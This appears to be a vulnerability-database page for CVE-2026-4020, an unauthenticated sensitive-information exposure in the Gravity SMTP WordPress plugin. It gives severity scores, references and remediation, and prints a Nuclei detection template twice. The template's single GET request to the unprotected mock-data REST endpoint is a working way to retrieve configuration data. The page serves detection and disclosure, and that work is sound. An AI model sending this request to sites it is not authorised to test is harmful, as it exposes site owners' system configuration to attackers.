Gravity SMTP WordPress Plugin - Sensitive Information Exposure

CVE-2026-4020

Verified

Description

Gravity SMTP WordPress plugin <= 2.1.4 contains a sensitive information exposure caused by an unrestricted REST API endpoint at /wp-json/gravitysmtp/v1/tests/mock-data, letting unauthenticated attackers retrieve detailed system configuration data, exploit requires no authentication.

Severity

High

CVSS Score

7.5

Exploit Probability

14%

Affected Product

gravitysmtp

Published Date

March 31, 2026

Template Author

theamanrawat

CVE-2026-4020.yaml

id: CVE-2026-4020

info:
  name: Gravity SMTP WordPress Plugin - Sensitive Information Exposure
  author: theamanrawat
  severity: high
  description: |
    Gravity SMTP WordPress plugin <= 2.1.4 contains a sensitive information exposure caused by an unrestricted REST API endpoint at /wp-json/gravitysmtp/v1/tests/mock-data, letting unauthenticated attackers retrieve detailed system configuration data, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can access detailed system and configuration data, potentially aiding further attacks or information leakage.
  remediation: |
    Update to the latest version beyond 2.1.4.
  reference:
    - https://patchstack.com/database/vulnerability/wordpress-gravity-smtp-plugin-2-1-4-unauthenticated-sensitive-information-exposure-via-rest-api-vulnerability
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/12a296db-ecc0-409b-8718-0c208504053a?source=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2026-4020
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-200
    cve-id: CVE-2026-4020
    epss-score: 0.13532
    epss-percentile: 0.94313
  metadata:
    max-request: 1
    verified: true
    vendor: rocketgenius
    product: gravitysmtp
    framework: wordpress
  tags: cve,cve2026,exposure,wordpress,wp-plugin,gravitysmtp,wp,unauthenticated,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/gravitysmtp/v1/tests/mock-data?page=gravitysmtp-settings"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "gravitysmtp_admin_config"
          - "system_report_clipboard"
          - "feature_flags"
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c3baab896c8688615735bddb6ef150d24426fd732f7593594b9ed6ed162ea1d6022100c727f3dcece01680c9fe6d4e39ff4cad75638dbc6861da0e67b8f097f2215a02:922c64590222798bb761d5b6d8e72950

7.5Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE ID:

cve-2026-4020

CWE ID:

cwe-200

References

https://patchstack.com/database/vulnerability/wordpress-gravity-smtp-plugin-2-1-4-unauthenticated-sensitive-information-exposure-via-rest-api-vulnerability https://www.wordfence.com/threat-intel/vulnerabilities/id/12a296db-ecc0-409b-8718-0c208504053a?source=cve https://nvd.nist.gov/vuln/detail/CVE-2026-4020

Remediation Steps

Update to the latest version beyond 2.1.4.

id: CVE-2026-4020

info:
  name: Gravity SMTP WordPress Plugin - Sensitive Information Exposure
  author: theamanrawat
  severity: high
  description: |
    Gravity SMTP WordPress plugin <= 2.1.4 contains a sensitive information exposure caused by an unrestricted REST API endpoint at /wp-json/gravitysmtp/v1/tests/mock-data, letting unauthenticated attackers retrieve detailed system configuration data, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can access detailed system and configuration data, potentially aiding further attacks or information leakage.
  remediation: |
    Update to the latest version beyond 2.1.4.
  reference:
    - https://patchstack.com/database/vulnerability/wordpress-gravity-smtp-plugin-2-1-4-unauthenticated-sensitive-information-exposure-via-rest-api-vulnerability
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/12a296db-ecc0-409b-8718-0c208504053a?source=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2026-4020
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-200
    cve-id: CVE-2026-4020
    epss-score: 0.13532
    epss-percentile: 0.94313
  metadata:
    max-request: 1
    verified: true
    vendor: rocketgenius
    product: gravitysmtp
    framework: wordpress
  tags: cve,cve2026,exposure,wordpress,wp-plugin,gravitysmtp,wp,unauthenticated,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/gravitysmtp/v1/tests/mock-data?page=gravitysmtp-settings"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "gravitysmtp_admin_config"
          - "system_report_clipboard"
          - "feature_flags"
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c3baab896c8688615735bddb6ef150d24426fd732f7593594b9ed6ed162ea1d6022100c727f3dcece01680c9fe6d4e39ff4cad75638dbc6861da0e67b8f097f2215a02:922c64590222798bb761d5b6d8e72950

Gravity SMTP WordPress Plugin - Sensitive Information Exposure

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

Gravity SMTP WordPress Plugin - Sensitive Information Exposure

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps